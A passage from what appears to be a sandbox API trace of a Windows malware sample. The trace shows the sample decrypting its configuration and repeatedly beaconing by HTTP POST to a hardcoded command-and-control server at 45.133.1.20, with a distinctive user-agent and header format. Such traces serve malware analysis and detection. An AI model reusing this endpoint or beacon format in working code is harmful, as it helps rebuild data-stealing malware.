pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0246.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.608] CryptDestroyKey (hKey=0x6ad060) returned 1 [0246.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.609] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0246.609] GetProcessHeap () returned 0x6a0000 [0246.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.610] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0246.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.611] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0246.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.613] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0246.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.614] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0246.614] GetProcessHeap () returned 0x6a0000 [0246.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0246.614] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0246.614] GetProcessHeap () returned 0x6a0000 [0246.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0246.614] socket (af=2, type=1, protocol=6) returned 0x804 [0246.614] connect (s=0x804, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0246.645] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0246.645] GetProcessHeap () returned 0x6a0000 [0246.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0246.645] GetProcessHeap () returned 0x6a0000 [0246.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0246.646] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.648] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.648] GetProcessHeap () returned 0x6a0000 [0246.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4df8 [0246.648] GetProcessHeap () returned 0x6a0000 [0246.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0246.648] GetProcessHeap () returned 0x6a0000 [0246.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0246.648] GetProcessHeap () returned 0x6a0000 [0246.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0246.650] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.651] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.651] GetProcessHeap () returned 0x6a0000 [0246.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0246.651] GetProcessHeap () returned 0x6a0000 [0246.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0246.651] send (s=0x804, buf=0x6bd460*, len=242, flags=0) returned 242 [0246.652] send (s=0x804, buf=0x6bb998*, len=159, flags=0) returned 159 [0246.652] GetProcessHeap () returned 0x6a0000 [0246.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0246.652] recv (in: s=0x804, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0246.730] GetProcessHeap () returned 0x6a0000 [0246.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0246.730] GetProcessHeap () returned 0x6a0000 [0246.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0246.732] GetProcessHeap () returned 0x6a0000 [0246.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4df8 | out: hHeap=0x6a0000) returned 1 [0246.732] GetProcessHeap () returned 0x6a0000 [0246.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0246.733] closesocket (s=0x804) returned 0 [0246.733] GetProcessHeap () returned 0x6a0000 [0246.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0246.734] GetProcessHeap () returned 0x6a0000 [0246.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.734] GetProcessHeap () returned 0x6a0000 [0246.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0246.735] GetProcessHeap () returned 0x6a0000 [0246.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0246.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1534) returned 0x804 [0246.738] Sleep (dwMilliseconds=0xea60) [0246.742] GetProcessHeap () returned 0x6a0000 [0246.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0246.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.753] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0246.760] GetProcessHeap () returned 0x6a0000 [0246.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba260 [0246.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.761] CryptImportKey (in: hProv=0x6bed28, pbData=0x6ba260, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0246.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.765] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.766] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.766] GetProcessHeap () returned 0x6a0000 [0246.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba260 | out: hHeap=0x6a0000) returned 1 [0246.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.767] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0246.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.768] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0246.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.769] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0246.769] GetProcessHeap () returned 0x6a0000 [0246.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.770] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.771] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.772] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.777] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.777] GetProcessHeap () returned 0x6a0000 [0246.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0246.777] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.777] GetProcessHeap () returned 0x6a0000 [0246.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0246.778] GetProcessHeap () returned 0x6a0000 [0246.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0246.778] GetProcessHeap () returned 0x6a0000 [0246.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0246.778] GetProcessHeap () returned 0x6a0000 [0246.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0246.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.780] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.787] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0246.794] GetProcessHeap () returned 0x6a0000 [0246.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0246.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.799] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0246.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.801] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.802] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.802] GetProcessHeap () returned 0x6a0000 [0246.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0246.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.804] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0246.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.808] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0246.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0246.809] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0246.809] GetProcessHeap () returned 0x6a0000 [0246.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0246.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.810] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0246.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.811] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0246.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.813] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0246.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0246.814] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0246.814] GetProcessHeap () returned 0x6a0000 [0246.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0246.814] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0246.814] GetProcessHeap () returned 0x6a0000 [0246.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0246.814] socket (af=2, type=1, protocol=6) returned 0x808 [0246.814] connect (s=0x808, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0246.974] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0246.974] GetProcessHeap () returned 0x6a0000 [0246.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0246.974] GetProcessHeap () returned 0x6a0000 [0246.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0246.975] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.976] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.976] GetProcessHeap () returned 0x6a0000 [0246.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c50f8 [0246.976] GetProcessHeap () returned 0x6a0000 [0246.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0246.977] GetProcessHeap () returned 0x6a0000 [0246.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0246.977] GetProcessHeap () returned 0x6a0000 [0246.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0246.978] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0246.979] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.979] GetProcessHeap () returned 0x6a0000 [0246.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0246.979] GetProcessHeap () returned 0x6a0000 [0246.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0246.981] send (s=0x808, buf=0x6bd460*, len=242, flags=0) returned 242 [0247.108] send (s=0x808, buf=0x6bb998*, len=159, flags=0) returned 159 [0247.108] GetProcessHeap () returned 0x6a0000 [0247.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0247.108] recv (in: s=0x808, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0247.230] GetProcessHeap () returned 0x6a0000 [0247.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0247.231] GetProcessHeap () returned 0x6a0000 [0247.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0247.231] GetProcessHeap () returned 0x6a0000 [0247.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c50f8 | out: hHeap=0x6a0000) returned 1 [0247.232] GetProcessHeap () returned 0x6a0000 [0247.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0247.232] closesocket (s=0x808) returned 0 [0247.233] GetProcessHeap () returned 0x6a0000 [0247.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0247.233] GetProcessHeap () returned 0x6a0000 [0247.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.234] GetProcessHeap () returned 0x6a0000 [0247.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0247.234] GetProcessHeap () returned 0x6a0000 [0247.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0247.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1538) returned 0x808 [0247.237] Sleep (dwMilliseconds=0xea60) [0247.238] GetProcessHeap () returned 0x6a0000 [0247.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0247.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.248] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0247.258] GetProcessHeap () returned 0x6a0000 [0247.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0247.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.260] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0247.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.261] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.262] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.262] GetProcessHeap () returned 0x6a0000 [0247.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0247.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.264] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0247.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.275] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0247.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.276] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0247.276] GetProcessHeap () returned 0x6a0000 [0247.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0247.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.278] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.279] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.281] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.282] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.282] GetProcessHeap () returned 0x6a0000 [0247.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0247.282] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.283] GetProcessHeap () returned 0x6a0000 [0247.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0247.283] GetProcessHeap () returned 0x6a0000 [0247.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0247.284] GetProcessHeap () returned 0x6a0000 [0247.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0247.284] GetProcessHeap () returned 0x6a0000 [0247.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0247.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0247.300] GetProcessHeap () returned 0x6a0000 [0247.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0247.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.301] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0247.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.302] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.303] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.303] GetProcessHeap () returned 0x6a0000 [0247.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0247.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.305] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0247.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.306] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0247.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0247.307] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0247.307] GetProcessHeap () returned 0x6a0000 [0247.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0247.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.308] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0247.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.309] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0247.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0247.310] StrStrA 